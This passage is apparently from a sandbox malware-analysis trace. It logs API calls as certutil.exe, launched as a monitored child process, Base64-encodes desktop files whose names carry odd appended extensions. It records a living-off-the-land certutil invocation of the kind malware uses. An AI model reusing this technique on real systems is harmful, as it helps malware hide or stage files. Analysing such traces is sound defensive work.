NtdllDefWindowProc_W () returned 0x1 [0226.484] NtdllDefWindowProc_W () returned 0x0 [0226.494] UpdateWindow (hWnd=0x502c6) returned 1 [0226.494] PostMessageW (hWnd=0x502c6, Msg=0x400, wParam=0x0, lParam=0x2655281217e) returned 1 [0226.494] GetMessageW (in: lpMsg=0xa97f74f8c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa97f74f8c0) returned 1 [0226.494] TranslateMessage (lpMsg=0xa97f74f8c0) returned 0 [0226.494] DispatchMessageW (lpMsg=0xa97f74f8c0) returned 0x0 [0226.494] NtdllDefWindowProc_W () returned 0x0 [0226.494] GetMessageW (in: lpMsg=0xa97f74f8c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa97f74f8c0) returned 1 [0226.495] TranslateMessage (lpMsg=0xa97f74f8c0) returned 0 [0226.495] DispatchMessageW (lpMsg=0xa97f74f8c0) returned 0x0 [0226.495] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x26552820820 [0226.495] LocalAlloc (uFlags=0x0, uBytes=0x9e) returned 0x26552814440 [0226.495] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0226.495] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0226.495] SetLastError (dwErrCode=0x80070716) [0226.495] _vsnwprintf (in: _Buffer=0xa97f74f2c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f2b8 | out: _Buffer="465") returned 3 [0226.495] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xa97f74f080, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0226.495] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2655281c310 [0226.495] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0226.496] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0226.496] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xa97f74f060, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0226.496] GetLastError () returned 0xcb [0226.496] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0226.496] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0226.496] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0226.496] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0226.496] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0226.496] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0226.496] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0226.496] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0226.496] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0226.496] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0226.496] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0226.496] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0226.496] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0226.496] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0226.497] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0226.497] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0226.497] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0226.497] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0226.497] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0226.497] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0226.497] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0226.497] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xa97f74ed28 | out: phkResult=0xa97f74ed28*=0x23c) returned 0x0 [0226.497] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x265528195c0 [0226.497] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xa97f74f298, lpData=0xa97f74f2c8, lpcbData=0xa97f74f290*=0x4 | out: lpType=0xa97f74f298*=0x0, lpData=0xa97f74f2c8*=0x0, lpcbData=0xa97f74f290*=0x4) returned 0x2 [0226.497] LocalFree (hMem=0x265528195c0) returned 0x0 [0226.497] RegCloseKey (hKey=0x23c) returned 0x0 [0226.497] LocalFree (hMem=0x0) returned 0x0 [0226.497] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2655283e570 [0226.511] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0226.511] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0226.511] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0226.511] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0226.511] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0226.511] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0226.512] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0226.512] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x26552842020 [0226.512] GetComputerNameW (in: lpBuffer=0x26552842020, nSize=0xa97f74f290 | out: lpBuffer="NQDPDE", nSize=0xa97f74f290) returned 1 [0226.513] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xa97f74f260 | out: lpBuffer=0x0, nSize=0xa97f74f260) returned 0 [0226.513] GetLastError () returned 0xea [0226.513] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2655282b570 [0226.513] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2655282b570, nSize=0xa97f74f260 | out: lpBuffer="NQdPdE", nSize=0xa97f74f260) returned 1 [0226.513] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0226.519] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x26552842270, cbCertEncoded=0x16a2d) returned 0x0 [0226.524] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x26552842270, cbCrlEncoded=0x16a2d) returned 0x0 [0226.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x26552842270, cbEncoded=0x16a2d, dwFlags=0x8000, pDecodePara=0xa97f74f140, pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4 | out: pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4) returned 0 [0226.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x26552842270, cbEncoded=0x16a2d, dwFlags=0x8000, pDecodePara=0xa97f74f140, pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4 | out: pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4) returned 0 [0226.528] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x26552842270, cbEncoded=0x16a2d, dwFlags=0x8000, pDecodePara=0xa97f74f140, pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4 | out: pvStructInfo=0xa97f74f1d0, pcbStructInfo=0xa97f74f1c4) returned 0 [0226.528] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x26552822270 [0226.538] CryptMsgUpdate (hCryptMsg=0x26552822270, pbData=0x26552842270, cbData=0x16a2d, fFinal=1) returned 0 [0226.538] GetLastError () returned 0x8009310b [0226.538] CryptMsgClose (hCryptMsg=0x26552822270) returned 1 [0226.538] GetFileAttributesExW (in: lpFileName="hvO9HhgzXnxX2Pa-RAL.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4.sister"), fInfoLevelId=0x0, lpFileInformation=0xa97f74f1f0 | out: lpFileInformation=0xa97f74f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7971430, ftCreationTime.dwHighDateTime=0x1d5e80d, ftLastAccessTime.dwLowDateTime=0x30ca2e90, ftLastAccessTime.dwHighDateTime=0x1d5e872, ftLastWriteTime.dwLowDateTime=0x30ca2e90, ftLastWriteTime.dwHighDateTime=0x1d5e872, nFileSizeHigh=0x0, nFileSizeLow=0x16a2d)) returned 1 [0226.538] _vsnwprintf (in: _Buffer=0xa97f74f1f8, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f1e8 | out: _Buffer="359") returned 3 [0226.538] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xa97f74efb0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0226.539] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26552841de0 [0226.539] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.539] _vsnwprintf (in: _Buffer=0xa97f74e1e0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xa97f74f238 | out: _Buffer="Input Length = 92717") returned 20 [0226.539] GetFileType (hFile=0x50) returned 0x2 [0226.539] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e1e0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xa97f74e194, lpReserved=0x0 | out: lpBuffer=0xa97f74e1e0*, lpNumberOfCharsWritten=0xa97f74e194*=0x14) returned 1 [0226.541] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.541] _vsnwprintf (in: _Buffer=0xa97f74e1e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa97f74f238 | out: _Buffer="\n") returned 1 [0226.541] GetFileType (hFile=0x50) returned 0x2 [0226.541] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e1e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa97f74e194, lpReserved=0x0 | out: lpBuffer=0xa97f74e1e0*, lpNumberOfCharsWritten=0xa97f74e194*=0x1) returned 1 [0226.566] GetFileAttributesExW (in: lpFileName="hvO9HhgzXnxX2Pa-RAL.mp4.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\hvo9hhgzxnxx2pa-ral.mp4.cruel"), fInfoLevelId=0x0, lpFileInformation=0xa97f74f1f0 | out: lpFileInformation=0xa97f74f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1a53316, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb1a53316, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb1a70e85, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1f238)) returned 1 [0226.567] _vsnwprintf (in: _Buffer=0xa97f74f1f8, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f1e8 | out: _Buffer="361") returned 3 [0226.567] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xa97f74efb0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0226.567] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x265528420b0 [0226.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.567] _vsnwprintf (in: _Buffer=0xa97f74e1e0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xa97f74f238 | out: _Buffer="Output Length = 127544") returned 22 [0226.567] GetFileType (hFile=0x50) returned 0x2 [0226.567] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e1e0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0xa97f74e194, lpReserved=0x0 | out: lpBuffer=0xa97f74e1e0*, lpNumberOfCharsWritten=0xa97f74e194*=0x16) returned 1 [0226.570] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.570] _vsnwprintf (in: _Buffer=0xa97f74e1e0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa97f74f238 | out: _Buffer="\n") returned 1 [0226.570] GetFileType (hFile=0x50) returned 0x2 [0226.571] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e1e0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa97f74e194, lpReserved=0x0 | out: lpBuffer=0xa97f74e1e0*, lpNumberOfCharsWritten=0xa97f74e194*=0x1) returned 1 [0226.575] LocalFree (hMem=0x26552842270) returned 0x0 [0226.575] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0226.575] _vsnwprintf (in: _Buffer=0xa97f74f258, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f248 | out: _Buffer="2022") returned 4 [0226.575] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xa97f74f010, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0226.576] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x26552818b20 [0226.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.576] _vsnwprintf (in: _Buffer=0xa97f74e240, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xa97f74f298 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0226.576] GetFileType (hFile=0x50) returned 0x2 [0226.576] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e240*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xa97f74e1f4, lpReserved=0x0 | out: lpBuffer=0xa97f74e240*, lpNumberOfCharsWritten=0xa97f74e1f4*=0x31) returned 1 [0226.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0226.576] _vsnwprintf (in: _Buffer=0xa97f74e240, _BufferCount=0x1ff, _Format="\n", _ArgList=0xa97f74f298 | out: _Buffer="\n") returned 1 [0226.576] GetFileType (hFile=0x50) returned 0x2 [0226.576] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xa97f74e240*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xa97f74e1f4, lpReserved=0x0 | out: lpBuffer=0xa97f74e240*, lpNumberOfCharsWritten=0xa97f74e1f4*=0x1) returned 1 [0226.583] LocalFree (hMem=0x0) returned 0x0 [0226.583] LocalFree (hMem=0x26552814440) returned 0x0 [0226.583] LocalFree (hMem=0x26552820820) returned 0x0 [0226.583] SetLastError (dwErrCode=0x80070716) [0226.583] _vsnwprintf (in: _Buffer=0xa97f74f2c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa97f74f2b8 | out: _Buffer="511") returned 3 [0226.584] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xa97f74f080, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0226.584] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x26552842200 [0226.584] PostQuitMessage (nExitCode=0) [0226.584] GetMessageW (in: lpMsg=0xa97f74f8c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa97f74f8c0) returned 0 [0226.584] LocalFree (hMem=0x2655282b570) returned 0x0 [0226.584] LocalFree (hMem=0x26552842020) returned 0x0 [0226.584] LocalFree (hMem=0x0) returned 0x0 [0226.584] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0226.585] GetLastError () returned 0x7e [0226.585] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0226.585] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0226.585] DllMain () returned 0x1 [0226.585] LocalFree (hMem=0x2655282b990) returned 0x0 [0226.585] LocalFree (hMem=0x2655281c310) returned 0x0 [0226.585] LocalFree (hMem=0x26552841de0) returned 0x0 [0226.585] LocalFree (hMem=0x265528420b0) returned 0x0 [0226.585] LocalFree (hMem=0x26552818b20) returned 0x0 [0226.585] LocalFree (hMem=0x26552842200) returned 0x0 [0226.585] LocalFree (hMem=0x26552834c70) returned 0x0 [0226.585] LocalFree (hMem=0x2655281bec0) returned 0x0 [0226.586] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0226.586] GetLastError () returned 0x7e [0226.586] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0226.586] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0226.586] DllMain () returned 0x1 [0226.586] exit (_Code=0) Thread: id = 53 os_tid = 0x648 Process: id = "18" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2281f000" os_pid = "0x1010" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 54 os_tid = 0x12c8 [0227.065] GetStartupInfoW (in: lpStartupInfo=0xf6b08ff740 | out: lpStartupInfo=0xf6b08ff740*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0227.069] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0227.106] __set_app_type (_Type=0x1) [0227.107] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0227.107] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0227.109] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0227.109] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0227.109] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0227.110] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0227.110] WerSetFlags () returned 0x0 [0227.110] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.110] __iob_func () returned 0x7ffcea2dea00 [0227.110] _fileno (_File=0x7ffcea2dea30) returned 1 [0227.110] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0227.110] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0227.111] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0227.111] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0227.111] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0227.112] GetConsoleOutputCP () returned 0x1b5 [0227.208] _vsnwprintf (in: _Buffer=0xf6b08ff6b0, _BufferCount=0xb, _Format=".%d", _ArgList=0xf6b08ff5d8 | out: _Buffer=".437") returned 4 [0227.208] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0227.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0227.208] GetFileType (hFile=0x50) returned 0x2 [0227.209] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0227.209] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0227.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.325] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0227.325] GetCommandLineW () returned="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"" [0227.325] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x23b078fbce0 [0227.325] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x23b078ec910 [0227.325] LocalFree (hMem=0x23b078fbce0) returned 0x0 [0227.325] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x23b078ec080 [0227.325] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x23b078ec2f0 [0227.325] LocalFree (hMem=0x23b078ec080) returned 0x0 [0227.325] LocalFree (hMem=0x23b078ec910) returned 0x0 [0227.325] LocalFree (hMem=0x0) returned 0x0 [0227.325] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0227.325] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0227.326] GetCommandLineW () returned="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"" [0227.326] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x23b078fbea0 [0227.326] GetSystemTime (in: lpSystemTime=0xf6b08ff3a0 | out: lpSystemTime=0xf6b08ff3a0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x1, wMilliseconds=0x363)) [0227.326] SystemTimeToFileTime (in: lpSystemTime=0xf6b08ff3a0, lpFileTime=0xf6b08ff398 | out: lpFileTime=0xf6b08ff398) returned 1 [0227.326] FileTimeToLocalFileTime (in: lpFileTime=0xf6b08ff398, lpLocalFileTime=0xf6b08ff360 | out: lpLocalFileTime=0xf6b08ff360) returned 1 [0227.326] FileTimeToSystemTime (in: lpFileTime=0xf6b08ff360, lpSystemTime=0xf6b08ff0d0 | out: lpSystemTime=0xf6b08ff0d0) returned 1 [0227.326] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xf6b08ff0d0, lpFormat=0x0, lpDateStr=0xf6b08ff1e0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0227.327] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xf6b08ff0d0, lpFormat=0x0, lpTimeStr=0xf6b08ff0e0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0227.327] _vsnwprintf (in: _Buffer=0xf6b08ff0ee, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xf6b08ff0b8 | out: _Buffer=" 01.867s") returned 8 [0227.327] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x23b078fe570 [0227.327] SetLastError (dwErrCode=0x80070716) [0227.327] _vsnwprintf (in: _Buffer=0xf6b08ff168, _BufferCount=0xb, _Format="%d", _ArgList=0xf6b08ff158 | out: _Buffer="948") returned 3 [0227.327] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xf6b08fef20, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0227.327] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x23b078fbd60 [0227.327] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x23b078f2480 [0227.327] LocalFree (hMem=0x23b078fe570) returned 0x0 [0227.328] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf6b08ff410 | out: lpSystemTimeAsFileTime=0xf6b08ff410*(dwLowDateTime=0xb21b4eb0, dwHighDateTime=0x1d6141f)) [0227.328] GetLocalTime (in: lpSystemTime=0xf6b08ff448 | out: lpSystemTime=0xf6b08ff448*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x1, wMilliseconds=0x364)) [0227.328] SystemTimeToFileTime (in: lpSystemTime=0xf6b08ff448, lpFileTime=0xf6b08ff420 | out: lpFileTime=0xf6b08ff420) returned 1 [0227.328] CompareFileTime (lpFileTime1=0xf6b08ff420, lpFileTime2=0xf6b08ff410) returned 1 [0227.328] _vsnwprintf (in: _Buffer=0xf6b08ff458, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xf6b08ff3e8 | out: _Buffer="GMT + 2.00") returned 10 [0227.328] LocalFree (hMem=0x23b078fbea0) returned 0x0 [0227.328] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcc9760000 [0227.328] FindResourceW (hModule=0x7ffcc9760000, lpName=0x1, lpType=0x10) returned 0x7ffcc9820090 [0227.328] LoadResource (hModule=0x7ffcc9760000, hResInfo=0x7ffcc9820090) returned 0x7ffcc98200b0 [0227.328] LockResource (hResData=0x7ffcc98200b0) returned 0x7ffcc98200b0 [0227.328] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0227.328] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xf6b08ff488 | out: _Buffer="10.0.15063.447") returned 14 [0227.329] GetACP () returned 0x4e4 [0227.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0227.329] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x23b078fba20 [0227.329] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x23b078fba20, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0227.329] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x23b078fe4b0 [0227.329] _vsnwprintf (in: _Buffer=0x23b078fe4b0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf6b08ff4d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0227.329] LocalFree (hMem=0x23b078fba20) returned 0x0 [0227.329] LocalFree (hMem=0x0) returned 